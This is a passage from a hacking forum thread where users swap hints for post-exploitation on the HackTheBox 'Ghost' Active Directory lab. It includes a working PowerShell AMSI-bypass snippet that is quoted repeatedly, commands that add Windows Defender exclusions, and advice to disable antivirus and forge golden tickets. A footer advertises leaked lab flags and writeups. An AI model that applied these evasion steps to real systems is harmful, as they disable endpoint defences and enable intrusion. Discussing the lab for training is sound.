Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
#81
Hello
can anyone please give hint what to do after getting system in PRIMARY machine ?
Reply
#82
(Jul 15, 2024, 12:31 AM)david30 Wrote: Hello
can anyone please give hint what to do after getting system in PRIMARY machine ?

abuse AD trusts and get a golden ticket
https://mvc1009.github.io/hackingnotes/a...t-attacks/
Reply
#83
(Jul 15, 2024, 12:33 AM)iiNovaCore Wrote:
(Jul 15, 2024, 12:31 AM)david30 Wrote: Hello
can anyone please give hint what to do after getting system in PRIMARY machine ?

abuse AD trusts and get a golden ticket
https://mvc1009.github.io/hackingnotes/a...t-attacks/

what after get system in proxychains4 -u  administrator -i 10.0.0.10 - H '' ........... "

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#84
(Jul 15, 2024, 12:43 AM)jimmyshoemacher Wrote: im stuck on ntauthority in PRIMARY

does anyone know where to go from here?

i can't run mimikatz, tried to obfuscate it doesn't work

I have tried many meterpreter shells those all get blocked.

i have a shell as ntauthority but no clue what to do at this point.

disable AV and go from there
Reply
#85
guys any hint after nauthority with evil-winrm

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#86
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else
Reply
#87
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#88
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like
Reply
#89
(Jul 15, 2024, 01:35 AM)maggi Wrote:
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like


Yes this works too bypassing amsi .. Ok what u got

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#90
(Jul 15, 2024, 01:42 AM)osamy7593 Wrote:
(Jul 15, 2024, 01:35 AM)maggi Wrote:
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: guys any hint after nauthority with evil-winrm

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote: I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)

That exclusion almost got mimikatz working tho...so more potent, I like


Yes this works too bypassing amsi .. Ok what u got

I have been readin the stuff on cross forest attacks....it is not quite clicking yet; well I don'tknow if I am messing up bloodhound anal-sis or I am plain illiterate glosing over soemthing in the readings

Direction              : BiDirectional
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,772 7 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,966 Yesterday, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,894 Yesterday, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,622 Yesterday, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,275 Apr 30, 2026, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)